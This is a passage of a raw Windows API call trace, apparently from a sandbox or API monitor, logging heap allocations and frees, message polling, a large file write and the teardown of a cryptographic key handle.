[0189.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0189.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0189.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0189.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0189.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0189.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0189.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0189.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0189.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0189.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0189.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0189.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0189.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0189.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0189.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f346f8 | out: hHeap=0x970000) returned 1 [0189.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0189.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0189.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d8) returned 0x3c322a8 [0189.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c21bc8 | out: hHeap=0x970000) returned 1 [0189.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.700] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0189.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0189.700] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0189.700] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0189.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0189.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0189.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0189.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0189.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0189.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d8) returned 0x2f24018 [0189.703] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f24018*, nNumberOfBytesToWrite=0x106d8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f24018*, lpNumberOfBytesWritten=0x8cf5e4*=0x106d8, lpOverlapped=0x0) returned 1 [0189.707] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0189.707] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0189.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0189.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0189.707] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0189.707] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0189.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0189.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0189.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0189.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0189.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0189.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0189.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0189.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0189.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0189.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0189.708] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.708] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0189.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0189.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0189.708] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0189.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0189.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0189.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0189.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0189.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0189.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0189.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0189.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0189.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0189.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0189.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0189.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0189.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0189.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0189.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0189.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0189.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0189.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0189.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50920, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0189.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0189.710] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0189.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0189.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0189.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0189.710] CryptDestroyKey (hKey=0xa87410) returned 1 [0189.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0189.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0189.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0189.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0189.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0189.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0189.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0189.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0189.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0189.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0189.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0189.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0189.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0189.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0189.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0189.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0189.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0189.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0189.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0189.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0189.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0189.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0189.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0189.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0189.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0189.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0189.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0189.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0189.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0189.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0189.712] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0189.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0189.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0189.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0189.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0189.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0189.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0189.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.712] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0189.713] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0189.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.713] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0189.713] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0189.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.713] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0189.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0189.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0189.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0189.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0189.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0189.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0189.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0189.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0189.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0189.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0189.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0189.714] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0189.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0189.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.714] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0189.714] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0189.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.721] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0189.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0189.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0189.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0189.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0189.721] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0189.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0189.721] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0189.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0189.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0189.721] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0189.722] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0189.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0189.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: 